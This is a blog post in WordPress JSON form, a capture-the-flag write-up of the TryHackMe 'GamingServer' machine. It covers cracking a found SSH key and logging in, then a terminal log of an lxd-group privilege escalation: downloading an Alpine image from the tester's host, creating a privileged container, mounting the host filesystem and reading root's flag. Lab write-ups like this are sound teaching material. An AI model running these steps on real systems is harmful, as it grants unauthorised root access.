{"id":503,"date":"2020-09-23T08:38:14","date_gmt":"2020-09-23T08:38:14","guid":{"rendered":"https:\/\/www.unordnung.net\/?p=503"},"modified":"2020-09-23T08:38:14","modified_gmt":"2020-09-23T08:38:14","slug":"writeup-gamingserver-tryhackme","status":"publish","type":"post","link":"https:\/\/unordnung.net\/misc\/2020\/09\/writeup-gamingserver-tryhackme\/","title":{"rendered":"Writeup GamingServer TryHackMe"},"content":{"rendered":"<p>Running a simple Content discovery with burp, you will find a secret folder with a private ssh key and a corresponding wordlist to crack it. load it to john with 2john and you got its pass. allowing a ssh login with the key as the user, which you&#8217;d found in comments on the site. yes boring. cat user.txt, flag scored.<br \/>\nlooking for priv esc i found the user to be in the lxc group, so we probably can elevate by mounting the root fs as fs in a container, like when you&#8217;re in the docker group with docker. let&#8217;s see.<br \/>\nyup, as i thought, build an alpine lxc container&#8230;<\/p>\n<pre><small>wget http:\/\/10.9.61.225:8000\/alpine-v3.12-x86_64-20200923_1026.tar.gz\n--2020-09-23 08:31:21--  http:\/\/10.9.61.225:8000\/alpine-v3.12-x86_64-20200923_1026.tar.gz\nConnecting to 10.9.61.225:8000... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 3215528 (3.1M) [application\/gzip]\nSaving to: \u2018alpine-v3.12-x86_64-20200923_1026.tar.gz\u2019\nalpine-v3.12-x86_64-20200923_1026.tar.gz                   100%[=======================================================================================================================================&gt;]   3.07M   791KB\/s    in 4.0s\n2020-09-23 08:31:25 (787 KB\/s) - \u2018alpine-v3.12-x86_64-20200923_1026.tar.gz\u2019 saved [3215528\/3215528]\njohn@exploitable:~$ lxc image import alpine-v3.12-x86_64-20200923_1026.tar.gz --alias alpine\nImage imported with fingerprint: 2ef98380d91867a7d01854e7a03b528e5880e90b30ba80f0dfb5731eb0009c8e\njohn@exploitable:~$ lxc image list\n+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+\n| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |\n+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+\n| alpine | 2ef98380d918 | no     | alpine v3.12 (20200923_10:26) | x86_64 | 3.07MB | Sep 23, 2020 at 8:31am (UTC) |\n+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+\njohn@exploitable:~$ lxc init alpine ignite -c security.privileged=true\nCreating ignite\njohn@exploitable:~$ lxc config device add ignite alpine disk source=\/ path=\/mnt\/root\/ recursive=true\nDevice alpine added to ignite\njohn@exploitable:~$ lxc start ignite\njohn@exploitable:~$ lxc exec ignite \/bin\/sh\n~ # id\nuid=0(root) gid=0(root)\n~ # cat \/mnt\/root\/root\/root.txt<\/small><\/pre>\n<p><small><br \/>\n<\/small><small><\/small><br \/>\npwned. ez af \ud83d\ude1b<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Running a simple Content discovery with burp, you will find a secret folder with a private ssh key and a corresponding wordlist to crack it. load it to john with 2john and you got its pass. 
allowing a ssh login with the key as the user, which you&#8217;d found in comments on the site. yes &#8230; <a title=\"Writeup GamingServer TryHackMe\" class=\"read-more\" href=\"https:\/\/unordnung.net\/misc\/2020\/09\/writeup-gamingserver-tryhackme\/\">Read more<span class=\"screen-reader-text\">Writeup GamingServer TryHackMe<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2,5,4],"tags":[29,74,80],"class_list":["post-503","post","type-post","status-publish","format-standard","hentry","category-blah","category-ctf-writeup","category-to_remember","tag-hacking","tag-tryhackme","tag-writeup"],"_links":{"self":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/503","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/comments?post=503"}],"version-history":[{"count":0,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/503\/revisions"}],"wp:attachment":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/media?parent=503"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/categories?post=503"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/tags?post=503"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}